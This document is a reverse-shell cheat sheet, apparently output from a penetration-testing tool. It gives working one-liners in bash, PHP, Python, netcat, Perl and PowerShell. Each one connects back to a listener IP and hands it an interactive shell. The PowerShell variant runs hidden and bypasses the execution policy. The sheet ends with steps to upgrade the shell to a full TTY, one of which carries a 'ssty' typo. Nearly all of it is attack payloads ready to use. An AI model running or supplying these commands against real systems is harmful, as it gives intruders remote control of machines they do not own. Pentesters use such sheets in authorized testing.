\033[90m======================================================================================
\033[92m[+ BASH]\033[0m

bash -i >& /dev/tcp/10.0.0.1/443 0>&1

\033[90m======================================================================================
\033[92m[+ PHP]\033[0m

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

\033[90m======================================================================================
\033[92m[+ PYTHON]\033[0m

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

\033[90m======================================================================================
\033[92m[+ NC]\033[0m

nc -e /bin/bash 10.0.0.1 443

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 443 >/tmp/f

\033[90m======================================================================================
\033[92m[+ PERL]\033[0m

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

\033[90m======================================================================================
\033[92m[+ POSH/Windows 11]\033[0m

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

\033[90m======================================================================================
\033[92m[+ Python Shell Upgrade]\033[0m

\033[94m# Drop to BASH shell for compatibility, then make connection\033[0m
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-z
ssty raw -echo
fg
export SHELL=/bin/bash; export TERM=xterm-256color
stty rows <rows> columns <cols>

\033[90m======================================================================================
